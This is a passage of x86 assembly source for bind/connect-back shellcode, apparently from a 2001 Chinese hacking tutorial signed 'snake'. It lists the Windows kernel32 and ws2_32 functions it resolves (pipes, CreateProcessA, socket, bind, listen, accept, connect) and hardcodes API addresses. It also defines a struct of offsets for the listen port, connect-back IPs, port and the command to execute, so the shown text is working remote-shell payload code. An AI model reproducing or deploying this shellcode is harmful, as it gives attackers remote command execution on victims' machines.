SHELL_NEED_FUNC_BODY_OFFSET equ $-szShellNeedFunc;//这个是shell函数和dll的偏移
db 02h
db 0eh, 'kernel32.dll+', '+'
db 0eh
db 11h, 'TerminateProcess', '+'
db 0bh, 'CreatePipe', '+'
db 10h, 'GetStartupInfoA', '+'
db 0fh, 'CreateProcessA', '+'
db 0eh, 'PeekNamedPipe', '+'
db 0ch, 'GlobalAlloc', '+'
db 0bh, 'WriteFile', '++'
db 09h, 'ReadFile', '+'
db 06h, 'Sleep', '+'
db 0ch, 'ExitProcess', '+'
db 0eh, 'GetLastError+', '+'
db 10h, 'DuplicateHandle', '+'
db 12h, 'GetCurrentProcess', '+'
db 0ch, 'CloseHandle','+'
db 0bh, 'ws2_32.dll', '+'
db 0bh
db 07h, 'socket', '+'
db 05h, 'bind', '+'
db 07h, 'listen', '+'
db 07h, 'accept', '+'
db 05h, 'send', '+'
db 05h, 'recv', '+'
db 0bh, 'setsockopt', '+'
db 0bh, 'WSAStartup', '+'
db 0ch, 'closesocket', '+'
db 08h, 'connect', '+'
db 0ch, 'gethostname', '+'
db '+++++++++++++++++++++'
_GetModuleHandle_Addr_Offset equ $-szShellNeedFunc
GetModuleHandleOffset equ $-start;
GetModuleHandleA_Addr dd 77e756dbh
GetProcAddressOffset equ $-start;
GetProcAddressA_Addr dd 77e7564bh
_size_szShellNeedFunc equ $-szShellNeedFunc+1
_size_AllData equ $-MyConnectInfo+1
_sk_Bind_ConnectShellCode endp
db '---------------------------------------------------------'
;//重要数据在代码中的偏移
stDataSetOffset struct
dwConnectType DD 0;
dwListenPort DD 0;
dwConnectIP1 DD 0;
dwConnectIP2 DD 0;
dwConnectPort DD 0;
dwExecCommand DD 0;
wSizeExecCommand DW 0;
wReserv1 DW 0
dwGetModuleHandle DD 0;
dwGetProcAddress DD 0;
stDataSetOffset ends
_GetDataSetOffset_Value proc
push ebp;
mov ebp, esp;
push esi;
push edi;
push edx;
push ecx;
push ebx;
push eax;
mov esi, FUNC_PARAM_1;
lea edi, [esi+stDataSetOffset.dwConnectType];
mov eax, ConnectTypeOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwListenPort];
mov eax, ListenPortOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectIP1];
mov eax, ConnectIP1Offset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectIP2];
mov eax, ConnectIP2Offset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectPort];
mov eax, ConnectPortOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwExecCommand];
mov eax, ExecCommandOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.wSizeExecCommand];
mov ax, SHELL_NEED_FUNC_BODY_OFFSET;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwGetModuleHandle];
mov eax, GetModuleHandleOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwGetProcAddress];
mov eax, GetProcAddressOffset;
mov [edi], eax;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
_GetDataSetOffset_Value endp
end
----完----
读者如果是看不明白程序的流程,或者有关程序的地方,请自己多多摸索。
by snake. 2001/7/31